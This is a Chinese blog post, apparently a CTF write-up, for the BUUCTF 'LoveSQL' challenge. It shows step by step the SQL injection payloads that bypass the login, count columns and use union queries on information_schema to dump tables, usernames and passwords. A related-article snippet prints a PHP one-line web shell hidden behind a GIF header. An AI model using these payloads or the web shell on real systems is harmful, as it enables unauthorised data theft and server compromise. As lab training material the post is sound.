【极客大挑战2019LoveSQL】

最新推荐文章于 2021-12-16 10:30:34 发布
最新推荐文章于 2021-12-16 10:30:34 发布
阅读量249 收藏 2
点赞数 1
分类专栏: Web安全-Sql注入 Web安全-CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/108554415
版权

题目地址:http://b7f87fb9-2d9b-47f3-8c81-31d54bda9fe7.node3.buuoj.cn
在这里插入图片描述
看到需要账户和密码直接采用万能钥匙来试一下。

admin’ or 1=1#
密码随便填就可以在这里插入图片描述

登陆成功了在这里插入图片描述
判断列数:

> /check.php ?username=1' order by 3%23&password=1

在这里插入图片描述没有报错,只是账户密码错误

当到order by 4 时报错了在这里插入图片描述
所以判断出有三个列数。
联合查询爆数据库

/check.php
?username=1'union select 1,2,database()%23&password=1

在这里插入图片描述
找到数据库名 ‘geek’。
爆数据表

/check.php
?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

在这里插入图片描述
得到两个表名:'geekuser','l0ve1ysq1’
爆字段名:

/check.php
?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=1

在这里插入图片描述
爆值

/check.php
?username=1'  union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

在这里插入图片描述
flag就在里边了!
总结:这道题其实并不难,我画了一个简图如下:在这里插入图片描述

Stray.io
关注
专栏目录
【pwn】2022 极客挑战
woodwhale的博客
11-22 1596
2022 极客挑战 pwn题解
BUUCTF系列 // [极客挑战 2019] LoveSQL
qq_45805420的博客
10-03 592
前言 本题知识点:SQL注入 WP (这题居然是个连续剧。。。 ) 首先尝试使用上一题的解法绕过看看(上一题 WP 的 传送门),结果如下: 注意到密码有些奇怪,尝试着用 MD5 解码失败,也没啥思路(最后事实证明确实也用不到这玩意),故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点 接着使用联合查询寻找注入点即回显
[极客挑战 2019]LoveSQL
qq_42404383的博客
08-10 402
文章目录[极客挑战 2019]LoveSQL题目:**分析:**解题:总结: [极客挑战 2019]LoveSQL 题目: 存在注入点 分析: 手动注入、尝试 ’ or 1 = 1; # 得到账户密码 admin cc084c3d58c1ecc212d9b4ff3f84aa4c 登录后还是没有我们想要的东西,所以现在就是要利用SQL注入从而获取表里数据 解题: 接下来就是按sql注入的流程操作: 1.测试有多少字段 使用order by 字段数为3 2.爆出当前数据库名和身
【python】OCR
bryant_meng
12-16 3203
先看看百度百科对 OCR 的定义: OCR (Optical Character Recognition,光学字符识别)是指电子设备(例如扫描仪或数码相机)检查纸上打印的字符,通过检测暗、亮的模式确定其形状,然后用字符识别方法将形状翻译成计算机文字的过程;即,针对印刷体字符,采用光学的方式将纸质文档中的文字转换成为黑白点阵的图像文件,并通过识别软件将图像中的文字转换成文本格式,供文字处理软件进一步编辑加工的技术。如何除错或利用辅助信息提高识别正确率,是OCR最重要的课题,ICR(Intelligent C.
BUUCTF-极客挑战2019
Atkx's Blog
01-27 701
[极客挑战2019]Http [极客挑战2019]upload 将里面的内容改为一句话木马 GIF89a <script language="php">eval($_POST['shell']);</script> /upload/test.phtml [极客挑战2019]PHP 访问靶机地址 提到了备份网站,直接访问www.zip文件,flag.php里面有个假的flag 查看一下index.php,发现要用get方式提交参数select 再查看class.php
2018极客挑战-not reverse
博客
11-30 511
欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 学好数学很重要 学好数学很重要 学好数学很重要 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: ...
【学习笔记 25】 buu [极客挑战 2019]LoveSQL
weixin_43553654的博客
07-27 351
0x00 知识点 1.利用常用万能密码登录 2.利用union构造联合注入得到flag 0x01 解题思路 1.打开网站,映入眼帘的就是一个登录界面,并且网页头上有一行小字,说是不让用sqlmap跑,那我偏要试试,但是现在还找不到注入点,继续进行,等下再试。这时在查看源码时发现验证的check.php页面和get的传参方式,直接访问check.php网页什么重要信息都没,那继续回到原网页利用常用的万能密码进行登录测试。 这里用到的是 用户名:admin'/* 密 码:*/' 登录成功。 发现被蓝色圈圈出
BUUCTF__[极客挑战 2019]LoveSQL_题解
风过江南乱的博客
06-19 1240
前言 很好,考完了死亡高数和大物,虽然还没考完,不过艰难的已经过去了,感觉神清气爽,水一题。 u1s1,线上考试=在海里考试。 读题 嗯,还是熟悉的背景图,好几题都是这个师傅出的sql注入。 首先很容易试出为单引号字符型闭合,输入 1、1"、1’ , 在1’时报错 然后尝试注入,发现,好像没有过滤,连 union 联合注入都能使用,并且很容易得到数据库名称,得到数据库名称geek 但在此之前,先得到列数为3,不是3则提示报错 然后,基本操作得到表信息,有两个表geekuser和l0ve1ysq
BUUCTF[极客挑战 2019]LoveSQL1
weixin_53955759的博客
06-18 230
这一题和easysql页面一样
极客挑战 2019]LoveSQL 1
最新发布
08-24
LoveSQL 1是极客挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...
【misc】2021 极客挑战(部分)
woodwhale的博客
11-29 4432
【misc】2021 极客挑战(部分) 1、今天有被破防吗? 0x1 最早上的一批题目,当时没什么思路。后来pwn神在群里提到了RGB,瞬间懂了! 参考链接: gaps拼图 0x2 下载附件得到一个很长的txt文本,其中每一行都是三个数字。如果知道是RGB就好处理了。 0x3 注意到一共1166400行,那么就是1080*1080的规格 简单的python脚本处理一下图片 from PIL import Image res = [] with open("./ans.txt","r") as f
极客挑战2019php,CTF-Web-[极客挑战 2019]PHP
weixin_39869693的博客
04-02 131
CTF-Web-[极客挑战 2019]PHP博客说明文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!CTP平台网址题目Web类,[极客挑战 2019]PHP 打开题目的实例 思路看到这种题目,我爱了特别是这个动画效果,做安全的前端也这么优秀吗?大佬不过我发下一个问题,这个动画搞的我打不开源代码了...
极客挑战wp(部分)
weixin_45396639的博客
04-26 393
1.Esay Sql 输入万能密码 2.Http 首先查看源码,发现有一个链接 去那个链接看看 构造http头,Referer:https://www.Sycsecret.com 发送看看,根据提示改user-agent 继续发送,继续根据提示改http头,添加X-Forwarded-For:127.0.0.1 最后,得到flag 3.Secret File 去网页源码看看 去链接...
BUU[极客挑战]LoveSQL
Marsper的博客
11-16 337
题目链接:http://8d2d10b1-b8e7-4ce4-a2f2-6b58d8c77ae9.node3.buuoj.cn/ 首先,测试发现是单引号的字符型注入 万能密码登录测试 用户名:admin’ or 1=1 # 密码:1 登陆成功后使用联合查询。 注意:输入框的#,直接使用hackbar地址栏,需将#进行URL编码,即替换为%23 一、爆字段 使用order by语句 check.php?username=admin' order by 1 %23&password=1 check.
极客挑战2020wp
Atkx's Blog
11-29 1529
Crypto 二战情报员刘壮 简介:你能知道刘壮在说什么?得到的flag包裹上SYC{} .-…/.----/…-/–…/…/…-/…-/-./–./…–.-/…/…–.-/–…/.----/-.–/.---- 提示:刘壮早上起床打摩丝 提交flag,发现错误,转换成小写还是不对,查看了一下群里给的hint,成功提交 铠甲与萨满 简介:YEI{roafnagtmroafnagtm_hgtmhgtmhgtm} 提示:kaisa? 偏移量为6时,得到flag MISC 一“页”障目 作者:lingze 简
CTF Geek Challenge——第十一届极客挑战Crypto Write Up
无限迭代中......
11-18 1150
比赛时间:2020年10月17日早上9点 比赛时限:一个月 参考文章
CTF Geek Challenge——第十一届极客挑战Misc Write Up
无限迭代中......
11-18 1067
比赛时间:2020年10月17日早上9点 比赛时限:一个月 参考文章
【记】2021年第十二届极客挑战
热门推荐
sid10t.
11-23 4万+
文章目录前言解题RERe0刘壮桌面美化大师买ActivityWEBDarkWelcome2021babysql 前言 极客挑战对萌新还是很友好的,特别适合我这种????   解题   RE Re0 F12就行,SYC{Welcome_to_Geek_challenge2021};   刘壮桌面美化大师 根据主要类看出这道 APK 题就是签到题,在资源下找 String 即可,SYC{We1c0m3_t0_4ndRo1d_ReV3rse!};   买Activity
CTF-Web-[极客挑战 2019]RCE ME
归子莫的博客
05-04 3515
CTF-Web-[极客挑战 2019]RCE ME 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]RCE ME 打开题目的实例 思路 把代码拿过来 <?ph...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值